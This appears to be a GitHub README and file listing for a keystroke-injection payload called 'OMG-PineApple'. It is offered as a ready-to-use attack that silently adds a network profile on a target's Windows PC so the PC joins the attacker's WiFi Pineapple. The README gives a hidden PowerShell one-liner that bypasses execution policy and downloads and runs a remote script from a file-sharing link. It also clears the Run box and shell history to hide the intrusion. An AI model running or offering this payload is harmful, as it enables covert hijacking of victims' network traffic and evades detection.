omg-payloads/payloads/library/general/-OMG-PineApple
I-Am-Jakoby 259bc62d77
Add files via upload
2022-05-09 22:42:25 -05:00
..
PineApple-Execute.txt Add files via upload 2022-05-09 22:42:25 -05:00
PineApple-KeyInjection.txt Add files via upload 2022-05-09 22:42:25 -05:00
PineApple.ps1 Add files via upload 2022-05-09 22:42:25 -05:00
README.md Add files via upload 2022-05-09 22:42:25 -05:00

README.md

Logo

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

OMG-PineApple

A script used to connect a targets PC to your wifi PineApple

Description

This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. Depending on your method of execution the XML file will either be manually entered into a powershell window or you may use and Invoke Web-Request to download a script to add the network profile. After either the history of the powershell window and run box will be erased for a clean exit.

Getting Started

Dependencies

  • DropBox or another File Hosting service - Your Shared link for the intended file
  • Windows 10,11

(back to top)

Executing program

  • Plug in your device
  • Either the entire script will be manually entered into the powershell window or
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
  • PS1 file to download is provided above
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl

(back to top)

Contributing

All contributors names will be listed here

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

I am Jakoby


Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-PineApple)

(back to top)

Acknowledgments

(back to top)